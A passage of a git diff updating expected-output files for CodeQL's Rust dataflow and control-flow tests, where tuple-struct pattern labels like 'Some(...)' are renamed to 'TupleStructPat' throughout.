main.rs:205:22:205:22 | [SSA] n | @@ -188,14 +188,14 @@ localStep | main.rs:212:9:212:10 | [SSA] s2 | main.rs:217:11:217:12 | s2 | | main.rs:212:9:212:10 | s2 | main.rs:212:9:212:10 | [SSA] s2 | | main.rs:212:14:212:20 | Some(...) | main.rs:212:9:212:10 | s2 | -| main.rs:213:11:213:12 | s1 | main.rs:214:9:214:15 | Some(...) | +| main.rs:213:11:213:12 | s1 | main.rs:214:9:214:15 | TupleStructPat | | main.rs:213:11:213:12 | s1 | main.rs:215:9:215:12 | None | | main.rs:214:14:214:14 | [SSA] n | main.rs:214:25:214:25 | n | | main.rs:214:14:214:14 | n | main.rs:214:14:214:14 | [SSA] n | | main.rs:214:20:214:26 | sink(...) | main.rs:213:5:216:5 | match s1 { ... } | | main.rs:215:17:215:23 | sink(...) | main.rs:213:5:216:5 | match s1 { ... } | | main.rs:217:5:220:5 | match s2 { ... } | main.rs:210:39:221:1 | { ... } | -| main.rs:217:11:217:12 | s2 | main.rs:218:9:218:15 | Some(...) | +| main.rs:217:11:217:12 | s2 | main.rs:218:9:218:15 | TupleStructPat | | main.rs:217:11:217:12 | s2 | main.rs:219:9:219:12 | None | | main.rs:218:14:218:14 | [SSA] n | main.rs:218:25:218:25 | n | | main.rs:218:14:218:14 | n | main.rs:218:14:218:14 | [SSA] n | @@ -210,8 +210,8 @@ localStep | main.rs:235:9:235:10 | [SSA] s2 | main.rs:243:11:243:12 | s2 | | main.rs:235:9:235:10 | s2 | main.rs:235:9:235:10 | [SSA] s2 | | main.rs:235:14:235:30 | ...::B(...) | main.rs:235:9:235:10 | s2 | -| main.rs:236:11:236:12 | s1 | main.rs:237:9:237:25 | ...::A(...) | -| main.rs:236:11:236:12 | s1 | main.rs:238:9:238:25 | ...::B(...) | +| main.rs:236:11:236:12 | s1 | main.rs:237:9:237:25 | TupleStructPat | +| main.rs:236:11:236:12 | s1 | main.rs:238:9:238:25 | TupleStructPat | | main.rs:236:11:236:12 | s1 | main.rs:240:11:240:12 | s1 | | main.rs:237:24:237:24 | [SSA] n | main.rs:237:35:237:35 | n | | main.rs:237:24:237:24 | n | main.rs:237:24:237:24 | [SSA] n | @@ -220,8 +220,8 @@ localStep | main.rs:238:24:238:24 | n | main.rs:238:24:238:24 | [SSA] n | | main.rs:238:30:238:36 | sink(...) | main.rs:236:5:239:5 | match s1 { ... } | | main.rs:240:11:240:12 | s1 | main.rs:241:9:241:45 | ... \| ... | -| main.rs:241:9:241:45 | ... \| ... | main.rs:241:9:241:25 | ...::A(...) | -| main.rs:241:9:241:45 | ... \| ... | main.rs:241:29:241:45 | ...::B(...) | +| main.rs:241:9:241:45 | ... \| ... | main.rs:241:9:241:25 | TupleStructPat | +| main.rs:241:9:241:45 | ... \| ... | main.rs:241:29:241:45 | TupleStructPat | | main.rs:241:9:241:45 | [SSA] [match(true)] phi | main.rs:241:55:241:55 | n | | main.rs:241:24:241:24 | [SSA] [input] [match(true)] phi | main.rs:241:9:241:45 | [SSA] [match(true)] phi | | main.rs:241:24:241:24 | [SSA] n | main.rs:241:24:241:24 | [SSA] [input] [match(true)] phi | @@ -231,8 +231,8 @@ localStep | main.rs:241:44:241:44 | n | main.rs:241:44:241:44 | [SSA] n | | main.rs:241:50:241:56 | sink(...) | main.rs:240:5:242:5 | match s1 { ... } | | main.rs:243:5:246:5 | match s2 { ... } | main.rs:233:48:247:1 | { ... } | -| main.rs:243:11:243:12 | s2 | main.rs:244:9:244:25 | ...::A(...) | -| main.rs:243:11:243:12 | s2 | main.rs:245:9:245:25 | ...::B(...) | +| main.rs:243:11:243:12 | s2 | main.rs:244:9:244:25 | TupleStructPat | +| main.rs:243:11:243:12 | s2 | main.rs:245:9:245:25 | TupleStructPat | | main.rs:244:24:244:24 | [SSA] n | main.rs:244:35:244:35 | n | | main.rs:244:24:244:24 | n | main.rs:244:24:244:24 | [SSA] n | | main.rs:244:30:244:36 | sink(...) | main.rs:243:5:246:5 | match s2 { ... } | @@ -245,8 +245,8 @@ localStep | main.rs:253:9:253:10 | [SSA] s2 | main.rs:261:11:261:12 | s2 | | main.rs:253:9:253:10 | s2 | main.rs:253:9:253:10 | [SSA] s2 | | main.rs:253:14:253:17 | B(...) | main.rs:253:9:253:10 | s2 | -| main.rs:254:11:254:12 | s1 | main.rs:255:9:255:12 | A(...) | -| main.rs:254:11:254:12 | s1 | main.rs:256:9:256:12 | B(...) | +| main.rs:254:11:254:12 | s1 | main.rs:255:9:255:12 | TupleStructPat | +| main.rs:254:11:254:12 | s1 | main.rs:256:9:256:12 | TupleStructPat | | main.rs:254:11:254:12 | s1 | main.rs:258:11:258:12 | s1 | | main.rs:255:11:255:11 | [SSA] n | main.rs:255:22:255:22 | n | | main.rs:255:11:255:11 | n | main.rs:255:11:255:11 | [SSA] n | @@ -255,8 +255,8 @@ localStep | main.rs:256:11:256:11 | n | main.rs:256:11:256:11 | [SSA] n | | main.rs:256:17:256:23 | sink(...) | main.rs:254:5:257:5 | match s1 { ... } | | main.rs:258:11:258:12 | s1 | main.rs:259:9:259:19 | ... \| ... | -| main.rs:259:9:259:19 | ... \| ... | main.rs:259:9:259:12 | A(...) | -| main.rs:259:9:259:19 | ... \| ... | main.rs:259:16:259:19 | B(...) | +| main.rs:259:9:259:19 | ... \| ... | main.rs:259:9:259:12 | TupleStructPat | +| main.rs:259:9:259:19 | ... \| ... | main.rs:259:16:259:19 | TupleStructPat | | main.rs:259:9:259:19 | [SSA] [match(true)] phi | main.rs:259:29:259:29 | n | | main.rs:259:11:259:11 | [SSA] [input] [match(true)] phi | main.rs:259:9:259:19 | [SSA] [match(true)] phi | | main.rs:259:11:259:11 | [SSA] n | main.rs:259:11:259:11 | [SSA] [input] [match(true)] phi | @@ -266,8 +266,8 @@ localStep | main.rs:259:18:259:18 | n | main.rs:259:18:259:18 | [SSA] n | | main.rs:259:24:259:30 | sink(...) | main.rs:258:5:260:5 | match s1 { ... } | | main.rs:261:5:264:5 | match s2 { ... } | main.rs:251:50:265:1 | { ... } | -| main.rs:261:11:261:12 | s2 | main.rs:262:9:262:12 | A(...) | -| main.rs:261:11:261:12 | s2 | main.rs:263:9:263:12 | B(...) | +| main.rs:261:11:261:12 | s2 | main.rs:262:9:262:12 | TupleStructPat | +| main.rs:261:11:261:12 | s2 | main.rs:263:9:263:12 | TupleStructPat | | main.rs:262:11:262:11 | [SSA] n | main.rs:262:22:262:22 | n | | main.rs:262:11:262:11 | n | main.rs:262:11:262:11 | [SSA] n | | main.rs:262:17:262:23 | sink(...) | main.rs:261:5:264:5 | match s2 { ... } | @@ -388,7 +388,7 @@ storeStep | main.rs:314:27:314:27 | 0 | Some | main.rs:314:22:314:28 | Some(...) | readStep | file://:0:0:0:0 | [summary param] self in lang:core::_::::unwrap | Some | file://:0:0:0:0 | [summary] read: Argument[self].Variant[crate::option::Option::Some(0)] in lang:core::_::::unwrap | -| main.rs:33:9:33:15 | Some(...) | Some | main.rs:33:14:33:14 | _ | +| main.rs:33:9:33:15 | TupleStructPat | Some | main.rs:33:14:33:14 | _ | | main.rs:95:10:95:10 | a | tuple.0 | main.rs:95:10:95:12 | a.0 | | main.rs:96:10:96:10 | a | tuple.1 | main.rs:96:10:96:12 | a.1 | | main.rs:109:10:109:10 | a | tuple.0 | main.rs:109:10:109:12 | a.0 | @@ -405,22 +405,22 @@ readStep | main.rs:151:9:151:28 | Point {...} | Point.x | main.rs:151:20:151:20 | a | | main.rs:151:9:151:28 | Point {...} | Point.y | main.rs:151:26:151:26 | b | | main.rs:183:9:186:9 | Point3D {...} | Point3D.plane | main.rs:184:20:184:33 | Point {...} | -| main.rs:201:9:201:23 | ...::Some(...) | Some | main.rs:201:22:201:22 | n | -| main.rs:205:9:205:23 | ...::Some(...) | Some | main.rs:205:22:205:22 | n | -| main.rs:214:9:214:15 | Some(...) | Some | main.rs:214:14:214:14 | n | -| main.rs:218:9:218:15 | Some(...) | Some | main.rs:218:14:218:14 | n | -| main.rs:237:9:237:25 | ...::A(...) | A | main.rs:237:24:237:24 | n | -| main.rs:238:9:238:25 | ...::B(...) | B | main.rs:238:24:238:24 | n | -| main.rs:241:9:241:25 | ...::A(...) | A | main.rs:241:24:241:24 | n | -| main.rs:241:29:241:45 | ...::B(...) | B | main.rs:241:44:241:44 | n | -| main.rs:244:9:244:25 | ...::A(...) | A | main.rs:244:24:244:24 | n | -| main.rs:245:9:245:25 | ...::B(...) | B | main.rs:245:24:245:24 | n | -| main.rs:255:9:255:12 | A(...) | A | main.rs:255:11:255:11 | n | -| main.rs:256:9:256:12 | B(...) | B | main.rs:256:11:256:11 | n | -| main.rs:259:9:259:12 | A(...) | A | main.rs:259:11:259:11 | n | -| main.rs:259:16:259:19 | B(...) | B | main.rs:259:18:259:18 | n | -| main.rs:262:9:262:12 | A(...) | A | main.rs:262:11:262:11 | n | -| main.rs:263:9:263:12 | B(...) | B | main.rs:263:11:263:11 | n | +| main.rs:201:9:201:23 | TupleStructPat | Some | main.rs:201:22:201:22 | n | +| main.rs:205:9:205:23 | TupleStructPat | Some | main.rs:205:22:205:22 | n | +| main.rs:214:9:214:15 | TupleStructPat | Some | main.rs:214:14:214:14 | n | +| main.rs:218:9:218:15 | TupleStructPat | Some | main.rs:218:14:218:14 | n | +| main.rs:237:9:237:25 | TupleStructPat | A | main.rs:237:24:237:24 | n | +| main.rs:238:9:238:25 | TupleStructPat | B | main.rs:238:24:238:24 | n | +| main.rs:241:9:241:25 | TupleStructPat | A | main.rs:241:24:241:24 | n | +| main.rs:241:29:241:45 | TupleStructPat | B | main.rs:241:44:241:44 | n | +| main.rs:244:9:244:25 | TupleStructPat | A | main.rs:244:24:244:24 | n | +| main.rs:245:9:245:25 | TupleStructPat | B | main.rs:245:24:245:24 | n | +| main.rs:255:9:255:12 | TupleStructPat | A | main.rs:255:11:255:11 | n | +| main.rs:256:9:256:12 | TupleStructPat | B | main.rs:256:11:256:11 | n | +| main.rs:259:9:259:12 | TupleStructPat | A | main.rs:259:11:259:11 | n | +| main.rs:259:16:259:19 | TupleStructPat | B | main.rs:259:18:259:18 | n | +| main.rs:262:9:262:12 | TupleStructPat | A | main.rs:262:11:262:11 | n | +| main.rs:263:9:263:12 | TupleStructPat | B | main.rs:263:11:263:11 | n | | main.rs:278:9:278:38 | ...::C {...} | C | main.rs:278:36:278:36 | n | | main.rs:279:9:279:38 | ...::D {...} | D | main.rs:279:36:279:36 | n | | main.rs:282:9:282:38 | ...::C {...} | C | main.rs:282:36:282:36 | n | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index eed358827da..ed51d66a1ad 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -25,30 +25,30 @@ edges | main.rs:148:12:148:21 | source(...) | main.rs:147:13:150:5 | Point {...} [Point.x] | provenance | | | main.rs:151:9:151:28 | Point {...} [Point.x] | main.rs:151:20:151:20 | a | provenance | | | main.rs:151:20:151:20 | a | main.rs:152:10:152:10 | a | provenance | | -| main.rs:198:14:198:37 | ...::Some(...) [Some] | main.rs:201:9:201:23 | ...::Some(...) [Some] | provenance | | +| main.rs:198:14:198:37 | ...::Some(...) [Some] | main.rs:201:9:201:23 | TupleStructPat [Some] | provenance | | | main.rs:198:27:198:36 | source(...) | main.rs:198:14:198:37 | ...::Some(...) [Some] | provenance | | -| main.rs:201:9:201:23 | ...::Some(...) [Some] | main.rs:201:22:201:22 | n | provenance | | +| main.rs:201:9:201:23 | TupleStructPat [Some] | main.rs:201:22:201:22 | n | provenance | | | main.rs:201:22:201:22 | n | main.rs:201:33:201:33 | n | provenance | | -| main.rs:211:14:211:29 | Some(...) [Some] | main.rs:214:9:214:15 | Some(...) [Some] | provenance | | +| main.rs:211:14:211:29 | Some(...) [Some] | main.rs:214:9:214:15 | TupleStructPat [Some] | provenance | | | main.rs:211:19:211:28 | source(...) | main.rs:211:14:211:29 | Some(...) [Some] | provenance | | -| main.rs:214:9:214:15 | Some(...) [Some] | main.rs:214:14:214:14 | n | provenance | | +| main.rs:214:9:214:15 | TupleStructPat [Some] | main.rs:214:14:214:14 | n | provenance | | | main.rs:214:14:214:14 | n | main.rs:214:25:214:25 | n | provenance | | | main.rs:224:14:224:29 | Some(...) [Some] | main.rs:225:10:225:11 | s1 [Some] | provenance | | | main.rs:224:19:224:28 | source(...) | main.rs:224:14:224:29 | Some(...) [Some] | provenance | | | main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | ... .unwrap(...) | provenance | | -| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:237:9:237:25 | ...::A(...) [A] | provenance | | -| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:241:9:241:25 | ...::A(...) [A] | provenance | | +| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:237:9:237:25 | TupleStructPat [A] | provenance | | +| main.rs:234:14:234:39 | ...::A(...) [A] | main.rs:241:9:241:25 | TupleStructPat [A] | provenance | | | main.rs:234:29:234:38 | source(...) | main.rs:234:14:234:39 | ...::A(...) [A] | provenance | | -| main.rs:237:9:237:25 | ...::A(...) [A] | main.rs:237:24:237:24 | n | provenance | | +| main.rs:237:9:237:25 | TupleStructPat [A] | main.rs:237:24:237:24 | n | provenance | | | main.rs:237:24:237:24 | n | main.rs:237:35:237:35 | n | provenance | | -| main.rs:241:9:241:25 | ...::A(...) [A] | main.rs:241:24:241:24 | n | provenance | | +| main.rs:241:9:241:25 | TupleStructPat [A] | main.rs:241:24:241:24 | n | provenance | | | main.rs:241:24:241:24 | n | main.rs:241:55:241:55 | n | provenance | | -| main.rs:252:14:252:26 | A(...) [A] | main.rs:255:9:255:12 | A(...) [A] | provenance | | -| main.rs:252:14:252:26 | A(...) [A] | main.rs:259:9:259:12 | A(...) [A] | provenance | | +| main.rs:252:14:252:26 | A(...) [A] | main.rs:255:9:255:12 | TupleStructPat [A] | provenance | | +| main.rs:252:14:252:26 | A(...) [A] | main.rs:259:9:259:12 | TupleStructPat [A] | provenance | | | main.rs:252:16:252:25 | source(...) | main.rs:252:14:252:26 | A(...) [A] | provenance | | -| main.rs:255:9:255:12 | A(...) [A] | main.rs:255:11:255:11 | n | provenance | | +| main.rs:255:9:255:12 | TupleStructPat [A] | main.rs:255:11:255:11 | n | provenance | | | main.rs:255:11:255:11 | n | main.rs:255:22:255:22 | n | provenance | | -| main.rs:259:9:259:12 | A(...) [A] | main.rs:259:11:259:11 | n | provenance | | +| main.rs:259:9:259:12 | TupleStructPat [A] | main.rs:259:11:259:11 | n | provenance | | | main.rs:259:11:259:11 | n | main.rs:259:29:259:29 | n | provenance | | | main.rs:273:14:275:5 | ...::C {...} [C] | main.rs:278:9:278:38 | ...::C {...} [C] | provenance | | | main.rs:273:14:275:5 | ...::C {...} [C] | main.rs:282:9:282:38 | ...::C {...} [C] | provenance | | @@ -103,12 +103,12 @@ nodes | main.rs:152:10:152:10 | a | semmle.label | a | | main.rs:198:14:198:37 | ...::Some(...) [Some] | semmle.label | ...::Some(...) [Some] | | main.rs:198:27:198:36 | source(...) | semmle.label | source(...) | -| main.rs:201:9:201:23 | ...::Some(...) [Some] | semmle.label | ...::Some(...) [Some] | +| main.rs:201:9:201:23 | TupleStructPat [Some] | semmle.label | TupleStructPat [Some] | | main.rs:201:22:201:22 | n | semmle.label | n | | main.rs:201:33:201:33 | n | semmle.label | n | | main.rs:211:14:211:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:211:19:211:28 | source(...) | semmle.label | source(...) | -| main.rs:214:9:214:15 | Some(...) [Some] | semmle.label | Some(...) [Some] | +| main.rs:214:9:214:15 | TupleStructPat [Some] | semmle.label | TupleStructPat [Some] | | main.rs:214:14:214:14 | n | semmle.label | n | | main.rs:214:25:214:25 | n | semmle.label | n | | main.rs:224:14:224:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | @@ -117,18 +117,18 @@ nodes | main.rs:225:10:225:20 | ... .unwrap(...) | semmle.label | ... .unwrap(...) | | main.rs:234:14:234:39 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:234:29:234:38 | source(...) | semmle.label | source(...) | -| main.rs:237:9:237:25 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:237:9:237:25 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:237:24:237:24 | n | semmle.label | n | | main.rs:237:35:237:35 | n | semmle.label | n | -| main.rs:241:9:241:25 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:241:9:241:25 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:241:24:241:24 | n | semmle.label | n | | main.rs:241:55:241:55 | n | semmle.label | n | | main.rs:252:14:252:26 | A(...) [A] | semmle.label | A(...) [A] | | main.rs:252:16:252:25 | source(...) | semmle.label | source(...) | -| main.rs:255:9:255:12 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:255:9:255:12 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:255:11:255:11 | n | semmle.label | n | | main.rs:255:22:255:22 | n | semmle.label | n | -| main.rs:259:9:259:12 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:259:9:259:12 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | | main.rs:259:11:259:11 | n | semmle.label | n | | main.rs:259:29:259:29 | n | semmle.label | n | | main.rs:273:14:275:5 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index eeb9301b434..f525638282b 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected @@ -7,9 +7,9 @@ edges | main.rs:31:27:31:27 | s | main.rs:31:14:31:28 | ...::A(...) [A] | provenance | | | main.rs:32:22:32:23 | e1 [A] | main.rs:32:10:32:24 | get_var_pos(...) | provenance | | | main.rs:43:13:43:21 | source(...) | main.rs:44:26:44:26 | s | provenance | | -| main.rs:44:14:44:27 | set_var_pos(...) [B] | main.rs:47:9:47:23 | ...::B(...) [B] | provenance | | +| main.rs:44:14:44:27 | set_var_pos(...) [B] | main.rs:47:9:47:23 | TupleStructPat [B] | provenance | | | main.rs:44:26:44:26 | s | main.rs:44:14:44:27 | set_var_pos(...) [B] | provenance | | -| main.rs:47:9:47:23 | ...::B(...) [B] | main.rs:47:22:47:22 | i | provenance | | +| main.rs:47:9:47:23 | TupleStructPat [B] | main.rs:47:22:47:22 | i | provenance | | | main.rs:47:22:47:22 | i | main.rs:47:33:47:33 | i | provenance | | | main.rs:62:13:62:21 | source(...) | main.rs:63:40:63:40 | s | provenance | | | main.rs:63:14:63:42 | ...::C {...} [C] | main.rs:64:24:64:25 | e1 [C] | provenance | | @@ -32,7 +32,7 @@ nodes | main.rs:43:13:43:21 | source(...) | semmle.label | source(...) | | main.rs:44:14:44:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | | main.rs:44:26:44:26 | s | semmle.label | s | -| main.rs:47:9:47:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | +| main.rs:47:9:47:23 | TupleStructPat [B] | semmle.label | TupleStructPat [B] | | main.rs:47:22:47:22 | i | semmle.label | i | | main.rs:47:33:47:33 | i | semmle.label | i | | main.rs:62:13:62:21 | source(...) | semmle.label | source(...) | diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index b55c0e9d04c..6b979eac0da 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected @@ -197,10 +197,10 @@ edges | variables.rs:85:32:85:39 | "Hello!" | variables.rs:85:19:85:40 | ...::from(...) | | | variables.rs:87:5:90:5 | if ... {...} | variables.rs:84:19:91:1 | { ... } | | | variables.rs:87:8:88:12 | let ... = s1 | variables.rs:88:11:88:12 | s1 | | -| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:5:90:5 | if ... {...} | no-match | -| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:17:87:22 | s2 | match | +| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:5:90:5 | if ... {...} | no-match | +| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:17:87:22 | s2 | match | | variables.rs:87:17:87:22 | s2 | variables.rs:89:9:89:22 | ExprStmt | match | -| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | Some(...) | | +| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | TupleStructPat | | | variables.rs:88:14:90:5 | { ... } | variables.rs:87:5:90:5 | if ... {...} | | | variables.rs:89:9:89:17 | print_str | variables.rs:89:19:89:20 | s2 | | | variables.rs:89:9:89:21 | print_str(...) | variables.rs:88:14:90:5 | { ... } | | @@ -210,11 +210,11 @@ edges | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | variables.rs:93:1:99:1 | exit fn let_pattern4 | | | variables.rs:93:19:99:1 | { ... } | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | | | variables.rs:94:5:97:10 | let ... = ... else {...} | variables.rs:94:34:94:37 | Some | | -| variables.rs:94:9:94:16 | Some(...) | variables.rs:94:14:94:15 | x5 | match | -| variables.rs:94:9:94:16 | Some(...) | variables.rs:96:13:96:19 | MacroStmts | no-match | +| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:94:14:94:15 | x5 | match | +| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:96:13:96:19 | MacroStmts | no-match | | variables.rs:94:14:94:15 | x5 | variables.rs:98:5:98:18 | ExprStmt | match | | variables.rs:94:34:94:37 | Some | variables.rs:94:39:94:42 | "x5" | | -| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | Some(...) | | +| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | TupleStructPat | | | variables.rs:94:39:94:42 | "x5" | variables.rs:94:34:94:43 | Some(...) | | | variables.rs:96:13:96:19 | "not yet implemented" | variables.rs:96:13:96:19 | ...::panic(...) | | | variables.rs:96:13:96:19 | ...::panic | variables.rs:96:13:96:19 | "not yet implemented" | | @@ -237,10 +237,10 @@ edges | variables.rs:102:32:102:39 | "Hello!" | variables.rs:102:19:102:40 | ...::from(...) | | | variables.rs:104:5:107:5 | while ... { ... } | variables.rs:101:19:108:1 | { ... } | | | variables.rs:104:11:105:12 | let ... = s1 | variables.rs:105:11:105:12 | s1 | | -| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:5:107:5 | while ... { ... } | no-match | -| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:20:104:25 | s2 | match | +| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:5:107:5 | while ... { ... } | no-match | +| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:20:104:25 | s2 | match | | variables.rs:104:20:104:25 | s2 | variables.rs:106:9:106:22 | ExprStmt | match | -| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | Some(...) | | +| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | TupleStructPat | | | variables.rs:105:14:107:5 | { ... } | variables.rs:104:11:105:12 | let ... = s1 | | | variables.rs:106:9:106:17 | print_str | variables.rs:106:19:106:20 | s2 | | | variables.rs:106:9:106:21 | print_str(...) | variables.rs:105:14:107:5 | { ... } | | @@ -259,17 +259,17 @@ edges | variables.rs:112:14:112:15 | 10 | variables.rs:112:9:112:10 | y1 | | | variables.rs:114:5:122:5 | ExprStmt | variables.rs:114:11:114:12 | x6 | | | variables.rs:114:5:122:5 | match x6 { ... } | variables.rs:124:5:124:18 | ExprStmt | | -| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | Some(...) | | -| variables.rs:115:9:115:16 | Some(...) | variables.rs:115:14:115:15 | 50 | match | -| variables.rs:115:9:115:16 | Some(...) | variables.rs:116:9:116:16 | Some(...) | no-match | +| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | TupleStructPat | | +| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:115:14:115:15 | 50 | match | +| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:116:9:116:16 | TupleStructPat | no-match | | variables.rs:115:14:115:15 | 50 | variables.rs:115:14:115:15 | 50 | | | variables.rs:115:14:115:15 | 50 | variables.rs:115:21:115:29 | print_str | match | -| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | Some(...) | no-match | +| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | TupleStructPat | no-match | | variables.rs:115:21:115:29 | print_str | variables.rs:115:31:115:38 | "Got 50" | | | variables.rs:115:21:115:39 | print_str(...) | variables.rs:114:5:122:5 | match x6 { ... } | | | variables.rs:115:31:115:38 | "Got 50" | variables.rs:115:21:115:39 | print_str(...) | | -| variables.rs:116:9:116:16 | Some(...) | variables.rs:116:14:116:15 | y1 | match | -| variables.rs:116:9:116:16 | Some(...) | variables.rs:121:9:121:12 | None | no-match | +| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:116:14:116:15 | y1 | match | +| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:121:9:121:12 | None | no-match | | variables.rs:116:14:116:15 | y1 | variables.rs:119:13:119:21 | print_i64 | match | | variables.rs:118:9:120:9 | { ... } | variables.rs:114:5:122:5 | match x6 { ... } | | | variables.rs:119:13:119:21 | print_i64 | variables.rs:119:23:119:24 | y1 | | @@ -404,12 +404,12 @@ edges | variables.rs:189:18:189:33 | ...::Left(...) | variables.rs:189:9:189:14 | either | | | variables.rs:189:31:189:32 | 32 | variables.rs:189:18:189:33 | ...::Left(...) | | | variables.rs:190:5:193:5 | match either { ... } | variables.rs:188:21:194:1 | { ... } | | -| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | ...::Left(...) | | -| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:22:191:23 | a3 | match | -| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:28:191:44 | ...::Right(...) | no-match | +| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | TupleStructPat | | +| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:22:191:23 | a3 | match | +| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:28:191:44 | TupleStructPat | no-match | | variables.rs:191:9:191:44 | [match(true)] ... \| ... | variables.rs:192:16:192:24 | print_i64 | match | | variables.rs:191:22:191:23 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | -| variables.rs:191:28:191:44 | ...::Right(...) | variables.rs:191:42:191:43 | a3 | match | +| variables.rs:191:28:191:44 | TupleStructPat | variables.rs:191:42:191:43 | a3 | match | | variables.rs:191:42:191:43 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | | variables.rs:192:16:192:24 | print_i64 | variables.rs:192:26:192:27 | a3 | | | variables.rs:192:16:192:28 | print_i64(...) | variables.rs:190:5:193:5 | match either { ... } | | @@ -424,47 +424,47 @@ edges | variables.rs:203:34:203:35 | 62 | variables.rs:203:14:203:36 | ...::Second(...) | | | variables.rs:204:5:207:5 | ExprStmt | variables.rs:204:11:204:12 | tv | | | variables.rs:204:5:207:5 | match tv { ... } | variables.rs:208:5:211:5 | ExprStmt | | -| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | ...::First(...) | | -| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:28:205:29 | a4 | match | -| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:34:205:56 | ...::Second(...) | no-match | +| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | TupleStructPat | | +| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:28:205:29 | a4 | match | +| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:34:205:56 | TupleStructPat | no-match | | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | variables.rs:206:16:206:24 | print_i64 | match | | variables.rs:205:28:205:29 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:54:205:55 | a4 | match | -| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:60:205:81 | ...::Third(...) | no-match | +| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:54:205:55 | a4 | match | +| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:60:205:81 | TupleStructPat | no-match | | variables.rs:205:54:205:55 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:60:205:81 | ...::Third(...) | variables.rs:205:79:205:80 | a4 | match | +| variables.rs:205:60:205:81 | TupleStructPat | variables.rs:205:79:205:80 | a4 | match | | variables.rs:205:79:205:80 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | | variables.rs:206:16:206:24 | print_i64 | variables.rs:206:26:206:27 | a4 | | | variables.rs:206:16:206:28 | print_i64(...) | variables.rs:204:5:207:5 | match tv { ... } | | | variables.rs:206:26:206:27 | a4 | variables.rs:206:16:206:28 | print_i64(...) | | | variables.rs:208:5:211:5 | ExprStmt | variables.rs:208:11:208:12 | tv | | | variables.rs:208:5:211:5 | match tv { ... } | variables.rs:212:11:212:12 | tv | | -| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | ...::First(...) | | +| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | TupleStructPat | | | variables.rs:209:9:209:83 | [match(true)] ... \| ... | variables.rs:210:16:210:24 | print_i64 | match | -| variables.rs:209:10:209:31 | 